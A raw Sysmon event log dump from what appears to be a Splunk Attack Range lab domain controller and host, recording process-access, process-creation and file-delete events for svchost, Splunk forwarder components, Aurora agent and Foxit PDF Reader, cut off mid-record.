12:27:33.043{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.043{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.043{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.043{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.043{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E5B5-63C7-7606-00000000AF02}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.043{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B5-63C7-7606-00000000AF02}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:33.044{FE4C2B44-E5B5-63C7-7606-00000000AF02}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018067Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B6-63C7-2D02-00000000B002}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018066Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018065Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018064Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018063Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018062Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018061Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018060Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018059Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018058Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018057Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E5B6-63C7-2D02-00000000B002}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018056Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.177{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B6-63C7-2D02-00000000B002}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018055Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.178{E5A8D418-E5B6-63C7-2D02-00000000B002}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018054Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:34.068{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=012D6AF4FFBB12CA5BA81C48F3CE77F2,SHA256=3EB09E5C928BDE4C5311AEAF06910B69EA1D2C4F869871E57382F83E0177E860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.891{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=E8BF58AAD491D0A60807EEB6A0ABA483,SHA256=3D3F3F66D618827032102E025DED86010ED2050478E1757182D3A0502B406082,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.876{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=2A57A5AC74A9011C3BD27B7A85D2C130,SHA256=552619D57D21F693778FC42B730B0523E1598A234F1237EC7E13AC0539F545DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.799{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 